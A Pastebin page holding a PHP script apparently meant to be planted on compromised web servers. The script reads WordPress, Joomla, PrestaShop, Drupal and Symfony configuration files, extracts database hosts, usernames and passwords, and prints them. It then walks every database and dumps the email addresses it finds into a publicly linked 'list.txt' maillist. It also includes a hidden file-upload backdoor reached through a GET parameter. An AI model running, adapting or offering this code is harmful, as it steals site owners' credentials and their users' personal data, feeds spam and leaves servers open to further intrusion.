Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- ini_set('memory_limit', '-1');
- echo "
- <html>
- <center><a href='list.txt'>MAILLIST</a><br>
- </html>
- ";
- if($_GET["wp"]){
- echo "wordpress <br><br>";
- $url=$_GET["wp"];
- $a=$_GET["a"];
- $filee=@file_get_contents($url);
- for($a=$a;$a<=800000;$a++){
- echo $a."<br><br>";
- $files=explode("\"> ",$filee);
- $aa=explode("</a></li>",$files[$a]);
- $ss= str_replace(array("<li><a href=\"","\n","\r","\r\n"," "), "", $aa[1]);
- $web=$url."/".$ss;
- echo $web."<br>";
- $file=@file_get_contents($web);
- if(@preg_match("/'DB_NAME', '/i",$file) or @preg_match("/'DB_USER', '/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $host=explode("'DB_HOST', '",$file);
- $host=explode("');",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("'DB_USER', '",$file);
- $user=explode("');",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("'DB_PASSWORD', '",$file);
- $pass=explode("');",
- $pass[1]);$pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- bajatax_co($host,$user,$pass,"list.txt");
- }}
- }
- if($_GET["joom"]){
- echo "joomla <br>";
- $url=$_GET["joom"];
- $a=$_GET["a"];
- $filee=@file_get_contents($url);
- for($a=$a;$a<=800000;$a++){
- echo $a."<br><br>";
- $files=explode("\"> ",$filee);
- $aa=explode("</a></li>",$files[$a]);
- $ss= str_replace(array("<li><a href=\"","\n","\r","\r\n"," "), "", $aa[1]);
- $web=$url."/".$ss;
- echo $web."<br>";
- $file=@file_get_contents($web);
- if(@preg_match("/class/i",$file) or @preg_match("/var/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $host=explode("\$host = '",$file);
- $host=explode("';",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("\$user = '",$file);
- $user=explode("';",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("\$password = '",$file);
- $pass=explode("';",$pass[1]);
- $pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- bajatax_co($host,$user,$pass,"list.txt");
- }}
- }
- if($_GET["presta"]){
- echo "presta <br>";
- $url=$_GET["presta"];
- $a=$_GET["a"];
- $filee=@file_get_contents($url);
- for($a=$a;$a<=800000;$a++){
- echo $a."<br><br>";
- $files=explode("\"> ",$filee);
- $aa=explode("</a></li>",$files[$a]);
- $ss= str_replace(array("<li><a href=\"","\n","\r","\r\n"," "), "", $aa[1]);
- $web=$url."/".$ss;
- echo $web."<br>";
- $file=@file_get_contents($web);
- if(@preg_match(".'_DB_SERVER_', '/i",$file) or @preg_match("/'_DB_NAME_', '/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $host=explode("'_DB_SERVER_', '",$file);
- $host=explode("');",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("'_DB_USER_', '",$file);
- $user=explode("');",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("'_DB_PASSWD_', '",$file);
- $pass=explode("');",
- $pass[1]);$pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- //////////////////////////////////////////////////////////////////////////
- bajatax_co($host,$user,$pass,"list.txt");
- exit();
- }}
- }
- if (file_exists("config/settings.inc.php") or ("../config/settings.inc.php") or ("../../config/settings.inc.php") or ("../../../config/settings.inc.php") or ("../../../../config/settings.inc.php") or ("../../../../../config/settings.inc.php") or ("../../../../../../config/settings.inc.php")) {
- $config=array(
- "config/settings.inc.php","../config/settings.inc.php","../../config/settings.inc.php","../../../config/settings.inc.php","../../../../config/settings.inc.php","../../../../../config/settings.inc.php","../../../../../../config/settings.inc.php"
- );
- foreach($config as $wpcon){
- $file=@file_get_contents($wpcon);
- if(@preg_match("/'_DB_SERVER_', '/i",$file) or @preg_match("/'_DB_NAME_', '/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $host=explode("'_DB_SERVER_', '",$file);
- $host=explode("');",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("'_DB_USER_', '",$file);
- $user=explode("');",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("'_DB_PASSWD_', '",$file);
- $pass=explode("');",
- $pass[1]);$pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- //////////////////////////////////////////////////////////////////////////
- bajatax_co($host,$user,$pass,"list.txt");
- exit();
- }}}
- if (file_exists("app/config/parameters.php") or ("../capp/config/parameters.php") or ("../../app/config/parameters.php") or ("../../../app/config/parameters.php") or ("../../../../app/config/parameters.php") or ("../../../../../app/config/parameters.php") or ("../../../../../../app/config/parameters.php")) {
- $config=array(
- "app/config/parameters.php","../app/config/parameters.php","../../app/config/parameters.php","../../../app/config/parameters.php","../../../../app/config/parameters.php","../../../../../app/config/parameters.php","../../../../../../app/config/parameters.php"
- );
- foreach($config as $wpcon){
- $file=@file_get_contents($wpcon);
- if(@preg_match("/database_name/i",$file) or @preg_match("/database_user/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $host=explode("database_host' => '",$file);
- $host=explode("'",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("database_user' => '",$file);
- $user=explode("'",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("database_password' => '",$file);
- $pass=explode("'",$pass[1]);$pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- //////////////////////////////////////////////////////////////////////////
- bajatax_co($host,$user,$pass,"list.txt");
- exit();
- }}}
- if (file_exists("wp-config.php") or ("../wp-config.php") or ("../../wp-config.php") or ("../../../wp-config.php") or ("../../../../wp-config.php") or ("../../../../../wp-config.php") or ("../../../../../../wp-config.php")) {
- $config=array(
- "wp-config.php","../wp-config.php","../../wp-config.php","../../../wp-config.php","../../../../wp-config.php","../../../../../wp-config.php","../../../../../../wp-config.php"
- );
- foreach($config as $wpcon){
- $file=@file_get_contents($wpcon);
- if(@preg_match("/'DB_NAME', '/i",$file) or @preg_match("/'DB_USER', '/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $host=explode("'DB_HOST', '",$file);
- $host=explode("'",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("'DB_USER', '",$file);
- $user=explode("'",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("'DB_PASSWORD', '",$file);
- $pass=explode("'",
- $pass[1]);$pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- //////////////////////////////////////////////////////////////////////////
- bajatax_co($host,$user,$pass,"list.txt");
- exit();
- }}}
- if(file_exists("configuration.php") or ("../configuration.php") or ("../../configuration.php") or ("../../../configuration.php") or ("../../../../configuration.php" or "../../../../../configuration.php" or"../../../../../../configuration.php")) {
- $config=array(
- "configuration.php","../configuration.php","../../configuration.php","../../../configuration.php","../../../../configuration.php","../../../../../configuration.php","../../../../../../configuration.php"
- );
- foreach($config as $wpcon){
- $file=@file_get_contents($wpcon);
- if(@preg_match("/'mysql',/i",$file) or @preg_match("/'username',/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $host=explode("var \$host = '",$file);
- $host=explode("'",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("var \$user = '",$file);
- $user=explode("'",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("var \$password = '",$file);
- $pass=explode("'",$pass[1]);
- $pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- ///////////////////////////////////:
- bajatax_co($host,$user,$pass,"list.txt");
- exit();
- }}
- }
- if(file_exists("sites/default/settings.php") or ("../sites/default/settings.php") or ("../../sites/default/settings.php") or ("../../../sites/default/settings.php") or ("../../../../sites/default/settings.php") or ("../../../../../sites/default/settings.php") or ("../../../../../../sites/default/settings.php")) {
- $config=array(
- "sites/default/settings.php","../sites/default/settings.php","../../sites/default/settings.php","../../../sites/default/settings.php","../../../../sites/default/settings.php","../../../../../sites/default/settings.php","../../../../../../sites/default/settings.php"
- );
- foreach($config as $wpcon){
- $file=@file_get_contents($wpcon);
- if(@preg_match("/'mysql',/i",$file) or @preg_match("/'username',/i",$file) ){
- //////////host////////////////
- //////////host////////////////
- $file=explode("\$databases = array (",$file);
- $host=explode("'host' => '",$file[1]);
- $host=explode("'",$host[1]);
- $host=$host[0];
- /////////user///////////////
- $user=explode("'username' => '",$file[1]);
- $user=explode("'",$user[1]);
- $user=$user[0];
- ////////password///////////
- $pass=explode("'password' => '",$file[1]);
- $pass=explode("'",$pass[1]);
- $pass=$pass[0];
- ///////////////////////////////////////
- echo "db-host : $host <br>";echo "db-user : $user <br>";echo "db-pass : $pass <br>";
- ///////////////////////////////////:
- bajatax_co($host,$user,$pass,"list.txt");
- exit();
- }}
- }
- else {
- echo "i dontknow :/ \n\n";
- }
- function grapper1($host,$user,$pass,$file){
- /*
- author : G-B
- email : fb/psycomiste.93
- */
- $con = mysql_connect($host,$user,$pass);
- $fp = fopen($file,'a');
- $count = 0;
- $databases = getdata("SHOW DATABASES");
- foreach($databases as $database){
- $tables = getdata("SHOW TABLES FROM $database");
- foreach($tables as $table){
- $columns = getdata("SHOW COLUMNS FROM $database.$table");
- foreach($columns as $column){
- $emails = getdata("SELECT $column FROM $database.$table WHERE $column REGEXP '[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]'");
- foreach($emails as $email){
- if(filter_var($email, FILTER_VALIDATE_EMAIL)){
- if(preg_match("/$email/i",file_get_contents($file))) continue;
- $count++;
- fwrite($fp,"$email\n");
- }else{
- foreach(preg_split("/\s/",$text) as $string){
- if(filter_var($string,FILTER_VALIDATE_EMAIL)){
- if(preg_match("/$string/i",file_get_contents($file))) continue;
- $count++;
- fwrite($fp,"$string\n");
- }
- }
- }
- }
- }
- }
- }
- fclose($fp);
- mysql_close($con);
- return $count;
- }
- function grapper2($host,$user,$pass,$file){
- $sql="SHOW DATABASES";
- $link = @mysqli_connect($host,$user,$pass) or die ('Error connecting to mysql: ' . mysqli_error($link).'\r\n');
- $result=@mysqli_query($link,$sql);
- $fp=fopen($file,"a");
- if(function_exists("chmod")){ @chmod($file,0755);}
- while( $row = mysqli_fetch_row( $result ) ){
- $database=$row[0];
- $result2=@mysqli_query($link,"SHOW TABLES FROM $database");
- while( $row2 = mysqli_fetch_row( $result2 ) ){
- $table=$row2[0];
- $result3=@mysqli_query($link,"SHOW COLUMNS FROM $database.$table");
- while( $row3 = mysqli_fetch_row( $result3 ) ){
- $column=$row3[0];
- $result4=@mysqli_query($link,"SELECT $column FROM $database.$table WHERE $column REGEXP '[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]'");
- while( $row4 = mysqli_fetch_row( $result4 ) ){
- $email=$row4[0];
- if(filter_var($email, FILTER_VALIDATE_EMAIL)){
- if(function_exists("file_get_contents")){ if(preg_match("/$email/i",file_get_contents($file))) continue; }
- $count++;
- fwrite($fp,"$email\n");
- }else{
- foreach(preg_split("/\s/",$text) as $string){
- if(filter_var($string,FILTER_VALIDATE_EMAIL)){
- if(function_exists("file_get_contents")){ if(preg_match("/$string/i",file_get_contents($file))) continue; }
- $count++;
- fwrite($fp,"$string\n");
- }
- }
- }
- }
- }
- }
- }
- }
- function getdata($sql){
- $q = @mysql_query($sql);
- $result = array();
- while(
- $d = @mysql_fetch_array($q)){
- $result[] = $d[0];
- }
- return $result;
- }
- function bajatax_co($host,$user,$pass,$file){
- if(function_exists("mysql_connect")){
- grapper1($host,$user,$pass,$file);
- }elseif(function_exists("mysqli_connect")){
- grapper2($host,$user,$pass,$file);
- }else{
- echo "No function grappe for this site exist :/ Add this site";
- }
- }
- $data = $_GET['bajatax'];
- if($data == 'up'){
- $filename = $_FILES['file']['name'];
- $filetmp = $_FILES['file']['tmp_name'];
- echo "<form method='POST' enctype='multipart/form-data'>
- <input type='file'name='file' />
- <input type='submit' value='data' />
- </form>";
- move_uploaded_file($filetmp,$filename);
- }
- ?>
Add Comment
Please, Sign In to add comment